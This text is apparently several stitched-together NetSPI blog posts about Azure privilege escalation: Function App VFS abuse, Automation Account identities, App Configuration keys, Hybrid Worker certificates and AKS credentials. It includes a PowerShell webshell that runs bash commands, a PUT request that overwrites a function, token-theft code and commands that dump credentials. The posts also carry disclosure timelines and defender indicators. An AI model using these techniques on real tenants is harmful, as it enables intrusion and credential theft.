"EasyAuthSpecializationPayload":{"SiteAuthEnabled":true,"SiteAuth ClientId":"18[REDACTED]43", "SiteAuthAutoProvisioned":true,"SiteAuthSettingsV2Json":null}, "Secrets":{"Host":{"Master":"Q[REDACTED]=","Function":{"default": "k[REDACTED]="}, "System":{}},"Function":[]}}
The important things to highlight here are:
- AzureWebJobsStorage and APPSETTING_AzureWebJobsStorage
- SCM_RUN_FROM_PACKAGE and APPSETTING_SCM_RUN_FROM_PACKAGE
- Function App “Master” and “Default” secrets
It should be noted that the “MICROSOFT_PROVIDER_AUTHENTICATION_SECRET” will also be available if the Function App has been set up to authenticate users via Azure AD. This is an App Registration credential that might be useful for gaining access to the tenant.
While the jobs storage information is a nice way to get access to the Function App Storage Account, we will be more interested in the Function “Master” App Secret, as that can be used to overwrite the functions in the app. By overwriting the functions, we can get full command execution in the container. This would also allow us to gain access to any attached Managed Identities on the Function App.
For our Proof of Concept, we’ll use the baseline PowerShell “hello” function as our template to overwrite:
This basic function just returns the “Name” submitted from a request parameter. For our purposes, we’ll convert this over to a Function App webshell (of sorts) that uses the “Name” parameter as the command to run.
using namespace System.Net # Input bindings are passed in via param block. param($Request, $TriggerMetadata) # Write to the Azure Functions log stream. Write-Host "PowerShell HTTP trigger function processed a request." # Interact with query parameters or the body of the request. $name = $Request.Query.Name if (-not $name) { $name = $Request.Body.Name } $body = "This HTTP triggered function executed successfully. Pass a name in the query string or in the request body for a personalized response." if ($name) { $cmdoutput = [string](bash -c $name) $body = (-join("Executed Command: ",$name,"`nCommand Output: ",$cmdoutput)) } # Associate values to output bindings by calling 'Push-OutputBinding'. Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{ StatusCode = [HttpStatusCode]::OK Body = $body })
To overwrite the function, we will use BurpSuite to send a PUT request with our new code. Before we do that, we need to make an initial request for the function code to get the associated ETag to use with PUT request.
Initial GET of the Function Code:
GET /admin/vfs/home/site/wwwroot/HttpTrigger1/run. ps1 HTTP/1.1 Host: vfspoc2.azurewebsites.net x-functions-key: Q[REDACTED]= HTTP/1.1 200 OK Content-Type: application/octet-stream Date: Wed, 21 Sep 2022 23:29:01 GMT Server: Kestrel ETag: "38aaebfb279cda08" Last-Modified: Wed, 21 Sep 2022 23:21:17 GMT Content-Length: 852 using namespace System.Net # Input bindings are passed in via param block. param($Request, $TriggerMetadata) [Truncated] })
PUT Overwrite Request Using the Tag as the "If-Match" Header:
PUT /admin/vfs/home/site/wwwroot/HttpTrigger1/ run.ps1 HTTP/1.1 Host: vfspoc2.azurewebsites.net x-functions-key: Q[REDACTED]= Content-Length: 851 If-Match: "38aaebfb279cda08" using namespace System.Net # Input bindings are passed in via param block. param($Request, $TriggerMetadata) # Write to the Azure Functions log stream. Write-Host "PowerShell HTTP trigger function processed a request." # Interact with query parameters or the body of the request. $name = $Request.Query.Name if (-not $name) { $name = $Request.Body.Name } $body = "This HTTP triggered function executed successfully. Pass a name in the query string or in the request body for a personalized response." if ($name) { $cmdoutput = [string](bash -c $name) $body = (-join("Executed Command: ",$name,"`nCommand Output: ",$cmdoutput)) } # Associate values to output bindings by calling 'Push-OutputBinding'. Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{ StatusCode = [HttpStatusCode]::OK Body = $body }) HTTP Response: HTTP/1.1 204 No Content Date: Wed, 21 Sep 2022 23:32:32 GMT Server: Kestrel ETag: "c243578e299cda08" Last-Modified: Wed, 21 Sep 2022 23:32:32 GMT
The server should respond with a 204 No Content, and an updated ETag for the file. With our newly updated function, we can start executing commands.
Sample URL:
https://vfspoc2.azurewebsites.net/api/HttpTrigger1?name= whoami&code=Q[REDACTED]=
Browser Output:
Now that we have full control over the Function App container, we can potentially make use of any attached Managed Identities and generate tokens for them. In our case, we will just add the following PowerShell code to the function to set the output to the management token we’re trying to export.
$resourceURI = "https://management.azure.com" $tokenAuthURI = $env:IDENTITY_ENDPOINT + "?resource= $resourceURI&api-version=2019-08-01" $tokenResponse = Invoke-RestMethod -Method Get -Headers @{"X-IDENTITY-HEADER"="$env:IDENTITY_HEADER"} -Uri $tokenAuthURI $body = $tokenResponse.access_token
Example Token Exported from the Browser:
For more information on taking over Azure Function Apps, check out this fantastic post by Bill Ben Haim and Zur Ulianitzky: 10 ways of gaining control over Azure function Apps.
Conclusion
Let's recap the issue:
- Start as a user with the Reader role on a Function App.
- Abuse the undocumented VFS API to read arbitrary files from the containers.
- Access encryption keys on the Windows containers or access the “proc” files from the Linux Container.
- Using the Linux container, read the process environmental variables.
- Use the variables to access configuration information in a SAS token URL.
- Decrypt the configuration information with the variables.
- Use the keys exposed in the configuration information to overwrite the function and gain command execution in the Linux Container.
All this being said, we submitted this issue through MSRC, and they were able to remediate the file access issues. The APIs are still there, so you may be able to get access to some of the Function App container and application files with the appropriate role, but the APIs are now restricted for the Reader role.
MSRC timeline
The initial disclosure for this issue, focusing on Windows containers, was sent to MSRC on Aug 2, 2022. A month later, we discovered the additional impact related to the Linux containers and submitted a secondary ticket, as the impact was significantly higher than initially discovered and the different base container might require a different remediation.
There were a few false starts on the remediation date, but eventually the vulnerable API was restricted for the Reader role on January 17, 2023. On January 24, 2023, Microsoft rolled back the fix after it caused some issues for customers.
On March 6, 2023, Microsoft reimplemented the fix to address the issue. The rollout was completed globally on March 8. At the time of publishing, the Reader role no longer has the ability to read files with the Function App VFS APIs. It should be noted that the Linux escalation path is still a viable option if an attacker has command execution on a Linux Function App.
[post_title] => Escalating Privileges with Azure Function Apps [post_excerpt] => Explore how undocumented APIs used by the Azure Function Apps Portal menu allowed for directory traversal on the Function App containers. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-function-apps [to_ping] => [pinged] => [post_modified] => 2023-03-23 08:24:38 [post_modified_gmt] => 2023-03-23 13:24:38 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=29749 [menu_order] => 132 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [8] => WP_Post Object ( [ID] => 29393 [post_author] => 10 [post_date] => 2023-02-16 09:00:00 [post_date_gmt] => 2023-02-16 15:00:00 [post_content] =>Intro
Azure Automation Accounts are a frequent topic on the NetSPI technical blog. To the point that we compiled our research into a presentation for the DEFCON 30 cloud village and the Azure Cloud Security Meetup Group. We're always trying to find new ways to leverage Automation Accounts during cloud penetration testing. To automate enumerating our privilege escalation options, we looked at how Automation Accounts handle authenticating as other accounts within a runbook, and how we can abuse those authentication connections to pivot to other Azure resources.
Passing the Identity in Azure Active Directory
As a primer, an Azure Active Directory (AAD) identity (User, App Registration, or Managed Identity) can have a role (Contributor) on an Automation Account that allows them to modify the account. The Automation Account can have attached identities that allow the account to authenticate to Azure AD as those identities. Once authenticated as the identity, the Automation Account runbook code will then run any Azure commands in the context of the identity. If that Identity has additional (or different) permissions from those of the AAD user that is writing the runbook, the AAD user can abuse those permissions to escalate or move laterally.
Simply put, Contributor on the Automation Account allows an attacker to be any identity attached to the Automation Account. These attached identities can have additional privileges, leading to a privilege escalation for the original Contributor account.
Available Identities for Azure Automation Accounts
There are two types of identities available for Automation Accounts: Run As Accounts and Managed Identities. The Run As Accounts will be deprecated on September 30, 2023, but they have been a source of several issues since they were introduced. When initially created, a Run As Account will be granted the Contributor role on the subscription it is created in.
These accounts are also App Registrations in Azure Active Directory that use certificates for authentication. These certificates can be extracted from Automation Accounts with a runbook and used for gaining access to the Run As Account. This is also helpful for persistence, as App Registrations typically don’t have conditional access restrictions applied.
For more on Azure Privilege Escalation using Managed Identities, check out this blog.
Managed Identities are the currently recommended option for using an execution identity in Automation Account runbooks. Managed Identities can either be system-assigned or user-assigned. System-assigned identities are tied to the resource that they are created for and cannot be shared between resources. User-assigned Managed Identities are a subscription level resource that can be shared across resources, which is handy for situations where resources, like multiple App Services applications, require shared access to a specific resource (Storage Account, Key Vault, etc.). Managed Identities are a more secure option for Automation Account Identities, as their access is temporary and must be generated from the attached resource.
Since Automation Accounts are frequently used to automate actions in multiple subscriptions, they are often granted roles in other subscriptions, or on higher level management groups. As attackers, we like to look for resources in Azure that can allow for pivoting to other parts of an Azure tenant. To help in automating this enumeration of the identity privileges, we put together a PowerShell script.
Automating Privilege Enumeration
The Get-AzAutomationConnectionScope function in MicroBurst is a relatively simple PowerShell script that uses the following logic:
- Get a list of available subscriptions
- For each selected subscription
- Get a list of available connections (Run As or Managed Identity)
- Build the Automation Account runbook to authenticate as the connection, and list available subscriptions and available Key Vaults
- Upload and run the runbook
- Retrieve the output and return it
- Delete the runbook
- For each selected subscription
In general, we are going to create a "malicious" automation runbook that goes through all the available identities in the Automation Account to tell us the available subscriptions and Key Vaults. Since the Key Vaults utilize a secondary access control mechanism (Access Policies), the script will also review the policies for each available Key Vault and report back any that have entries for our current identity. While a Contributor on a Key Vault can change these Access Policies, it is helpful to know which identities already have Key Vault access.
The usage of the script is simple. Just authenticate to the Az PowerShell module (Connect-AzAccount) as a Contributor on an Automation Account and run “Get-AzAutomationConnectionScope”. The verbose flag is very helpful here, as runbooks can take a while to run, and the verbose status update is nice.
Note that this will also work for cross-tenant Run As connections. As a proof of concept, we created a Run As account in another tenant (see “Automation Account Connection – dso” above), uploaded the certificate and authentication information (Application ID and Tenant) to our Automation Account, and the connection was usable with this script. This can be a convenient way to pivot to other tenants that your Automation Account is responsible for. That said, it's rare for us to see a cross-tenant connection like that.
As a final note on the script, the "Classic Run As" connections in an older Automation Account will not work with this script. They may show up in your output, but they require additional authentication logic in the runbook, and given the low likelihood of their usage, we've opted to avoid adding the logic in for those connections.
Indicators of Compromise
To help out the Azure defenders, here is a rough outline on how this script would look in a subscription/tenant from an incident response perspective:
- Initial Account Authentication
a. User/App Registration authenticates via the Az PowerShell cmdlets
- Subscriptions / Automation Accounts Enumerated
a. The script has you select an available subscription to test, then lists the available Automation Accounts to select from
- Malicious Runbook draft is created in the Automation Account
a. Microsoft.Automation/automationAccounts/runbooks/write
b. Microsoft.Automation/automationAccounts/runbooks/draft/write
- Malicious Runbook is published to the Automation Account
a. Microsoft.Automation/automationAccounts/runbooks/publish/action
- Malicious Runbook is executed as a job
a. Microsoft.Automation/automationAccounts/jobs/write
- Run As connections and/or Managed Identities should show up as authentication events
- Malicious Runbook is deleted from the Automation Account
a. Microsoft.Automation/automationAccounts/runbooks/delete
Providing the full rundown is a little beyond the scope of this blog, but Lina Lau (@inversecos) has a great blog on detections for Automation Accounts that covers a persistence technique I previously outlined in a previous article titled, Maintaining Azure Persistence via Automation Accounts. Lina’s blog should also cover most of the steps that we have outlined above.
For additional detail on Automation Account attack paths, take a look at Andy Robbins’ blog, Managed Identity Attack Paths, Part 1: Automation Accounts.
Conclusion
While Automation Account identities are often a necessity for automating actions in an Azure tenant, they can allow a user (with the correct role) to abuse the identity permissions to escalate and/or pivot to other subscriptions.
The function outlined in this blog should be helpful for enumerating potential pivot points from an existing Automation Account where you have Contributor access. From here, you could create custom runbooks to extract credentials, or pivot to Virtual Machines that your identity has access to. Alternatively, defenders can use this script to see the potential blast radius of a compromised Automation Account in their subscriptions.
Ready to improve your Azure security? Explore NetSPI’s Azure Cloud Penetration Testing solutions. Or checkout these blog posts for more in-depth research on Azure Automation Accounts:
- Get-AzurePasswords: Exporting Azure RunAs Certificates for Persistence
- Using Azure Automation Accounts to Access Key Vaults
- Escalating Azure Privileges with the Log Analytics Contributor Role
- CVE-2021-42306 CredManifest: App Registration Certificates Stored in Azure
Active Directory
Most Azure environments that we test contain multiple kinds of application hosting services (App Services, AKS, etc.). As these applications grow and scale, we often find that the application configuration parameters will be shared between the multiple apps. To help with this scaling challenge, Microsoft offers the Azure App Configuration service. The service allows Azure users to create key-value pairs that can be shared across multiple application resources. In theory, this is a great way to share non-sensitive configuration values across resources. In practice, we see these configurations expose sensitive information to users with permission to read the values.
TL;DR
The Azure App Configuration service can often hold sensitive data values. This blog post outlines gathering and using access keys for the service to retrieve the configuration values.
What are App Configurations?
The App Configuration service is a very simple service. Provide an Id and Secret to an “azconfig.io” endpoint and get back a list of key-value pairs that integrate into your application environment. This is a really simple way to share configuration information across multiple applications, but we have frequently found sensitive information (keys, passwords, connection strings) in these configuration values. This is a known problem, as Microsoft specifically calls out secret storage in their documentation, noting Key Vaults as the recommended secure solution.
Gathering Access Keys
Within the App Configuration service, two kinds of access keys (Read-write and Read-only) can be used for accessing the service and the configuration values. Additionally, Read-write keys allow you to change the stored values, so access to these keys could allow for additional attacks on applications that take action on these values. For example, by modifying a stored value for an “SMBSHAREHOST” parameter, we might be able to force an application to initiate an SMB connection to a host that we control. This is just one example, but depending on how these values are utilized, there is potential for further attacks.
Regardless of the type of key that an attacker acquires, this can lead to access the configuration values. Much like the other key-based authentication services in Azure, you are also able to regenerate these keys. This is particularly useful if your keys are ever unintentionally exposed.
To read these keys, you will need Contributor role access to the resource or access to a role with the “Microsoft.AppConfiguration/configurationStores/ListKeys/” action.
From the portal, you can copy out the connection string directly from the “Access keys” menu.
This connection string will contain the Endpoint, Id, and Secret, which can all be used together to access the service.
Alternatively, using the Az PowerShell cmdlets, we can list out the available App Configurations (Get-AzAppConfigurationStore) and for each configuration store, we can get the keys (Get-AzAppConfigurationStoreKey). This process is also automated by the Get-AzPasswords function in MicroBurst with the “AppConfiguration” flag.
Finally, if you don’t have initial access to an Azure subscription to collect these access keys, we have found App Configuration connection strings in web applications (via directory traversal/local file include attacks) and in public GitHub repositories. A cursory search of public data sources results in a fair number of hits, so there are a few access keys floating around out there.
Using the Keys
Typically, these connection strings are tied to an application environment, so the code environment makes the calls out to Azure to gather the configurations. When initially looking into this service, we used a Microsoft Learn example application with our connection string and proxied the application traffic to look at the request out to azconfig.io.
This initial look into the azconfig.io API calls showed that we needed to use the Id and Secret to sign the requests with a SHA256-HMAC signature. Conveniently, Microsoft provides documentation on how we can do this. Using this sample code, we added a new function to MicroBurst to make it easier to request these configurations.
The Get-AzAppConfiguration function (in the “Misc” folder) can be used with the connection string to dump all the configuration values from an App Configuration.
In our example, I just have “test” values for the keys. As noted above, if you have the Read-write key for the App Configuration, you will be able to modify the values of any of the keys that are not set to “locked”. Depending on how these configuration values are interpreted by the application, this could lead to some pivoting opportunities.
IoCs
Since we just provided some potential attack options, we also wanted to call out any IoCs that you can use to detect an attacker going after your App Configurations:
- Azure Activity Log - List Access Keys
- Category – “Administrative”
- Action – “Microsoft.AppConfiguration/configurationStores/ListKeys/action”
- Status – “Started”
- Caller – < UPN of account listing keys>
- App Configuration Service Logs
- Application Configuration audit logs capture the key used to access App Configuration data as part of the “RequestURI” string in the diagnostic table of the app service. Where Azure AD authentication is used to control access to App Configuration data, the audit logs capture the details of the account used to access the data.
Conclusions
We showed you how to gather access keys for App Configuration resources and how to use those keys to access the configuration key-value pairs. This will hopefully give Azure pentesters something to work with if they run into an App Configuration connection string and defenders areas to look at to help secure their configuration environments.
For those using Azure App Configurations, make sure that you are not storing any sensitive information within your configuration values. Key Vaults are a much better solution for this and will give you additional protections (Access Policies and logging) that you don’t have with App Configurations. Finally, you can also disable access key authentication for the service and rely on Azure Active Directory (AAD) for authentication. Depending on the configuration of your environment, this may be a more secure configuration option.
Need help testing your Azure app configurations? Explore NetSPI’s Azure cloud penetration testing.
[post_title] => How to Gather Azure App Configurations [post_excerpt] => Learn how to gather access keys for App Configuration resources and how to use those keys to access the configuration key-value pairs. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => gathering-azure-app-configurations [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:18:32 [post_modified_gmt] => 2023-03-16 14:18:32 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28955 [menu_order] => 175 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [10] => WP_Post Object ( [ID] => 27487 [post_author] => 10 [post_date] => 2022-03-17 08:00:00 [post_date_gmt] => 2022-03-17 13:00:00 [post_content] =>On the NetSPI blog, we often focus on Azure Automation Accounts. They offer a fair amount of attack surface area during cloud penetration tests and are a great source for privilege escalation opportunities.
During one of our recent Azure penetration testing assessments, we ran into an environment that was using Automation Account Hybrid Workers to run automation runbooks on virtual machines. Hybrid Workers are an alternative to the traditional Azure Automation Account container environment for runbook execution. Outside of the “normal” runbook execution environment, automation runbooks need access to additional credentials to interact with Azure resources. This can lead to a potential privilege escalation scenario that we will cover in this blog.
TL;DR
Azure Hybrid Workers can be configured to use Automation Account “Run as” accounts, which can expose the credentials to anyone with local administrator access to the Hybrid Worker. Since “Run as” accounts are typically subscription contributors, this can lead to privilege escalation from multiple Azure Role-Based Access Control (RBAC) roles.
What are Azure Hybrid Workers?
For those that need more computing resources (CPU, RAM, Disk, Time) to run their Automation Account runbooks, there is an option to add Hybrid Workers to an Automation Account. These Hybrid Workers can be Azure Virtual Machines (VMs) or Arc-enabled servers, and they allow for additional computing flexibility over the normal limitations of the Automation Account hosted environment. Typically, I’ve seen Hybrid Workers as Windows-based Azure VMs, as that’s the easiest way to integrate with the Automation Account runbooks.
In this article, we’re going to focus on instances where the Hybrid Workers are Windows VMs in Azure. They’re the most common configuration that we run into, and the Linux VMs in Azure can’t be configured to use the “Run as” certificates, which are the target of this blog.
The easiest way to identify Automation Accounts that use Hybrid Workers is to look at the “Hybrid worker groups” section of an Automation Account in the portal. We will be focusing on the “User” groups, versus the “System” groups for this post.
Additionally, you can use the Az PowerShell cmdlets to identify the Hybrid Worker groups, or you can enumerate the VMs that have the “HybridWorkerExtension” VM extension installed. I’ve found this last method is the most reliable for finding potentially vulnerable VMs to attack.
Additional Azure Automation Accounts Research:
- Get-AzurePasswords: Exporting Azure RunAs Certificates for Persistence
- Using Azure Automation Accounts to Access Key Vaults
- Escalating Azure Privileges with the Log Analytics Contributor Role
- CVE-2021-42306 CredManifest: App Registration Certificates Stored in Azure Active Directory
Running Jobs on the Workers
To run jobs on the Hybrid Worker group, you can modify the “Run settings” in any of your runbook execution options (Schedules, Webhook, Test Pane) to “Run on” the Hybrid Worker group.
When the runbook code is executed on the Hybrid Worker, it is run as the “NT AUTHORITY\SYSTEM” account in Windows, or “root” in Linux. If an Azure AD user has a role (Automation Contributor) with Automation Account permissions, and no VM permissions, this could allow them to gain privileged access to VMs.
We will go over this in greater detail in part two of this blog, but Hybrid Workers utilize an undocumented internal API to poll for information about the Automation Account (Runbooks, Credentials, Jobs). As part of this, the Hybrid Workers are not supposed to have direct access to the certificates that are used as part of the traditional “Run As” process. As you will see in the following blog, this isn’t totally true.
To make up for the lack of immediate access to the “Run as” credentials, Microsoft recommends exporting the “Run as” certificate from the Automation Account and installing it on each Hybrid Worker in the group of workers. Once installed, the “Run as” credential can then be referenced by the runbook, to authenticate as the app registration.
If you have access to an Automation Account, keep an eye out for any lingering “Export-RunAsCertificateToHybridWorker” runbooks that may indicate the usage of the “Run as” certificates on the Hybrid Workers.
The issue with installing these “Run As” certificates on the Hybrid Workers is that anyone with local administrator access to the Hybrid Worker can extract the credential and use it to authenticate as the “Run as” account. Given that “Run as” accounts are typically configured with the Contributor role at the subscription scope, this could result in privilege escalation.
Extracting “Run As” Credentials from Hybrid Workers
We have two different ways of accessing Windows VMs in Azure, direct authentication (Local or Domain accounts) and platform level command execution (VM Run Command in Azure). Since there are a million different ways that someone could gain access to credentials with local administrator rights, we won’t be covering standard Windows authentication. Instead, we will briefly cover the multiple Azure RBAC roles that allow for various ways of command execution on Azure VMs.
Affected Roles:
- Virtual Machine Contributor
- Run Command Rights
- VM Extension Rights
- Virtual Machine Administrator Login
- "Log in to a virtual machine with Windows administrator or Linux root user privileges"
- Log Analytics Contributor
- VM Extension Rights
- Previously covered in this blog
- Virtual Machine User Login
- May have rights to login and access the “Run as” PFX file left over in C:\Windows\Temp
- Azure Connected Machine Onboarding
- Can add new ARC machines, which may get the “Run as”
certificate installed
- Can add new ARC machines, which may get the “Run as”
- Azure Connected Machine Resource Administrator
- Can add new ARC machines, which may get the “Run as”
certificate installed - Azure ARC Extension Rights
- Can add new ARC machines, which may get the “Run as”
Where noted above (VM Extension Rights), the VM Extension command execution method comes from the following NetSPI blog: Attacking Azure with Custom Script Extensions.
Since the above roles are not the full Contributor role on the subscription, it is possible for someone with one of the above roles to extract the “Run as” credentials from the VM (see below) to escalate to a subscription Contributor. This is a somewhat similar escalation path to the one that we previously called out for the Log Analytics Contributor role.
Exporting the Certificate from the Worker
As a local administrator on the Hybrid Worker VM, it’s fairly simple to export the certificate. With Remote Desktop Protocol (RDP) access, we can just manually go into the certificate manager (certmgr), find the “Run as” certificate, and export it to a pfx file.
At this point we can copy the file from the Hybrid Worker to use for authentication on another system. Since this is a bit tedious to do at scale, we’ve automated the whole process with a PowerShell script.
Automating the Process
The following script is in the MicroBurst repository under the “Az” folder:
https://github.com/NetSPI/MicroBurst/blob/master/Az/Invoke-AzHybridWorkerExtraction.ps1
This script will enumerate any running Windows virtual machines configured with the Hybrid Worker extension and will then run commands on the VMs (via Invoke-AzVMRunCommand) to export the available private certificates. Assuming the Hybrid Worker is only configured with one exportable private certificate, this will return the certificate as a Base64 string in the run command output.
PS C:\temp\hybrid> Invoke-AzHybridWorkerExtraction -Verbose VERBOSE: Logged In as kfosaaen@notarealdomain.com VERBOSE: Getting a list of Hybrid Worker VMs VERBOSE: Running extraction script on the HWTest virtual machine VERBOSE: Looking for the attached App Registration... This may take a while in larger environments VERBOSE: Writing the AuthAs script VERBOSE: Use the C:\temp\HybridWorkers\AuthAsNetSPI_tester_[REDACTED].ps1 script to authenticate as the NetSPI_sQ[REDACTED]g= App Registration VERBOSE: Script Execution on HWTest Completed VERBOSE: Run as Credential Dumping Activities Have Completed
The script will then write this Base64 certificate data to a file and use the resulting certificate thumbprint to match against App Registration credentials in Azure AD. This will allow the script to find the App Registration Client ID that is needed to authenticate with the exported certificate.
Finally, this will create an “AuthAs” script (noted in the output) that can be used to authenticate as the “Run as” account, with the exported private certificate.
PS C:\temp\hybrid> ls | select Name, Length Name Length ---- ------ AuthAsNetSPI_tester_[Redacted_Sub_ID].ps1 1018 NetSPI_tester_[Redacted_Sub_ID].pfx 2615
This script can be run with any RBAC role that has VM “Run Command” rights on the Hybrid Workers to extract out the “Run as” credentials.
Authenticating as the “Run As” Account
Now that we have the certificate, we can use the generated script to authenticate to the subscription as the “Run As” account. This is very similar to what we do with exporting credentials in the Get-AzPasswords function, so this may look familiar.
PS C:\temp\hybrid> .\AuthAsNetSPI_tester_[Redacted_Sub_ID].ps1 PSParentPath: Microsoft.PowerShell.Security\Certificate::LocalMachine\My Thumbprint Subject ---------- ------- BDD023EC342FE04CC1C0613499F9FF63111631BB DC=NetSPI_tester_[Redacted_Sub_ID] Environments : {[AzureChinaCloud, AzureChinaCloud], [AzureCloud, AzureCloud], [AzureGermanCloud, AzureGermanCloud], [AzureUSGovernment, AzureUSGovernment]} Context : Microsoft.Azure.Commands.Profile.Models.Core.PSAzureContext PS C:\temp\hybrid> (Get-AzContext).Account Id : 52[REDACTED]57 Type : ServicePrincipal Tenants : {47[REDACTED]35} Credential : TenantMap : {} CertificateThumbprint : BDD023EC342FE04CC1C0613499F9FF63111631BB ExtendedProperties : {[Subscriptions, d4[REDACTED]b2], [Tenants, 47[REDACTED]35], [CertificateThumbprint, BDD023EC342FE04CC1C0613499F9FF63111631BB]}
Alternative Options
Finally, any user with the ability to run commands as “NT AUTHORITY\SYSTEM” on the Hybrid Workers is also able to assume the authenticated Azure context that results from authenticating (Connect-AzAccount) to Azure while running a job as a Hybrid Worker.
This would result in users being able to run Az PowerShell module functions as the “Run as” account via the Azure “Run command” and “Extension” features that are available to many of the roles listed above. Assuming the “Connect-AzAccount” function was previously used with a runbook, an attacker could just use the run command feature to run other Az module functions with the “Run as” context.
Additionally, since the certificate is installed on the VM, a user could just use the certificate to directly authenticate from the Hybrid Worker, if there was no active login context.
Summary
In conjunction with the issues outlined in part two of this blog, we submitted our findings to MSRC.
Since this issue ultimately relies on an Azure administrator giving a user access to specific VMs (the Hybrid Workers), it’s considered a user misconfiguration issue. Microsoft has updated their documentation to reflect the potential impact of installing the “Run as” certificate on the VMs. Additionally, you could also modify the certificate installation process to mark the certificates as “non-exportable” to help protect them.
We would recommend against using “Run as” accounts for Automation Accounts and instead switch to using managed identities on the Hybrid Worker VMs.
Stay tuned to the NetSPI technical blog for the second half of this series that will outline how we were able to use a Reader role account to extract credentials and certificates from Automation Accounts. In subscriptions where Run As accounts were in use, this resulted in a Reader to Contributor privilege escalation.
Prior Work
While we were working on these blogs, the Azsec blog put out the “Laterally move by abusing Log Analytics Agent and Automation Hybrid worker” post that outlines some similar techniques to what we’ve outlined above. Read the post to see how they make use of Log Analytics to gain access to the Hybrid Worker groups.
[post_title] => Abusing Azure Hybrid Workers for Privilege Escalation – Part 1 [post_excerpt] => In this cloud penetration testing blog, learn how to abuse Azure Hybrid Workers for privilege escalation. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => abusing-azure-hybrid-workers-for-privilege-escalation [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:20:54 [post_modified_gmt] => 2023-03-16 14:20:54 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=27487 [menu_order] => 295 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [11] => WP_Post Object ( [ID] => 27255 [post_author] => 10 [post_date] => 2022-01-27 09:00:00 [post_date_gmt] => 2022-01-27 15:00:00 [post_content] =>As more applications move to a container-based model, we are running into more instances of Azure Kubernetes Services (AKS) being used in Azure subscriptions. The service itself can be complicated and have a large attack surface area. In this post we will focus on how to extract credentials from the AKS service in Azure, using the Contributor role permissions on an AKS cluster.
While we won’t explain how Kubernetes works, we will use some common terms throughout this post. It may be helpful to have this Kubernetes glossary open in another tab for reference. Additionally, we will not cover how to collect the Kubernetes “Secrets” from the service or how to review pods/containers for sensitive information. We’ll save those topics for a future post.
What is Azure Kubernetes Service (AKS)?
In the simplest terms, the AKS service is an Azure resource that allows you to run a Kubernetes cluster in Azure. When created, the AKS cluster resource consists of sub-resources (in a special resource group) that support running the cluster. These sub-resources, and attached cluster, allow you to orchestrate containers and set up Kubernetes workloads. As a part of the orchestration process, the cluster needs to be assigned an identity (a Service Principal or a Managed Identity) in the Azure tenant.
Service Principal versus Managed Identity
When provisioning an AKS cluster, you will have to choose between authenticating with a Service Principal or a System-assigned Managed Identity. By default, the Service Principal that is assigned to the cluster will get the ACRPull role assigned at the subscription scope level. While it’s not a guarantee, by using an existing Service Principal, the attached identity may also have additional roles already assigned in the Azure tenant.
In contrast, a newly created System-assigned Managed Identity on an AKS cluster will not have any assigned roles in a subscription. To further complicate things, the “System-assigned” Managed Identity is actually a “User-assigned” Managed Identity that’s created in the new Resource Group for the Virtual Machine Scale Set (VMSS) cluster resources. There’s no “Identity” menu in the AKS portal blade, so it’s my understanding that the User-assigned Managed Identity is what gets used in the cluster. Each of these authentication methods have their benefits, and we will have different approaches to attacking each one.
In order to access the credentials (Service Principal or Managed Identity) associated with the cluster, we will need to execute commands on the cluster. This can be done by using an authenticated kubectl session (which we will explore in the Gathering kubectl Credentials section), or by executing commands directly on the VMSS instances that support the cluster.
When a new cluster is created in AKS, a new resource group is created in the subscription to house the supporting resources. This new resource group is named after the resource group that the AKS resource was created under, and the name of the cluster.
For example, a cluster named “testCluster” that was deployed in the East US region and in the “tester” resource group would have a new resource group that was created named “MC_tester_testCluster_eastus”.
This resource group will contain the VMSS, some supporting resources, and the Managed Identities used by the cluster.
Gathering Service Principal Credentials
First, we will cover clusters that are configured with a Service Principal credential. As part of the configuration process, Azure places the Service Principal credentials in cleartext into the “/etc/kubernetes/azure.json” file on the cluster. According to the Microsoft documentation, this is by design, and is done to allow the cluster to use the Service Principal credentials. There are legitimate uses of these credentials, but it always feels wrong finding them available in cleartext.
In order to get access to the azure.json file, we will need to run a command on the cluster to “cat” out the file from the VMSS instance and return the command output.
The VMSS command execution can be done via the following options:
- Az PowerShell – Invoke-AzVmssVMRunCommand
- Az CLI – az vmss run-command
- Azure REST APIs – Microsoft Documentation Page
The Az PowerShell method is what is used in Get-AzPasswords, but you could manually use any of the above methods.
In Get-AzPasswords, this command execution is done by using a local command file (.\tempscript) that is passed into the Invoke-AzVmssVMRunCommand function. The command output is then parsed with some PowerShell and exported to the output table for the Get-AzPasswords function.
Learn more about how to use Get-AzPasswords in my blog, Get-AzPasswords: Encrypting Automation Password Data.
Privilege Escalation Potential
There is a small issue here: Contributors on the subscription can gain access to a Service Principal credential that they are not the owner of. If the Service Principal has additional permissions, it could allow the contributor to escalate privileges.
In this example:
- User A creates a Service Principal (AKS-SP), generates a password for it, and retains the “Owner” role on the Service Principal in Azure AD
- User A creates the AKS cluster (Test cluster) and assigns it the Service Principal credentials
- User B runs commands to extract credentials from the VMSS instance that runs the AKS cluster
- User B now has cleartext credentials for a Service Principal (AKS-SP) that they do not have Owner rights on
This is illustrated in the diagram below.
For all of the above, assume that both User A and B have the Contributor role on the subscription, and no additional roles assigned on the Azure AD tenant. Additionally, this attack could extend to the VM Contributor role and other roles that can run commands on VMSS instances (Microsoft.Compute/virtualMachineScaleSets/virtualMachines/runCommand/action).
Gathering Managed Identity Credentials
If the AKS cluster is configured with a Managed Identity, we will have to use the metadata service to get a token. We have previously covered this general process in the following blogs:
- Gathering Bearer Tokens from Azure Services
- Lateral Movement in Azure App Services
- Azure Privilege Escalation Using Managed Identities
In this case, we will be using the VMSS command execution functionality to make a request to “https://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/”. This will return a JWT that is scoped to the management.azure.com domain.
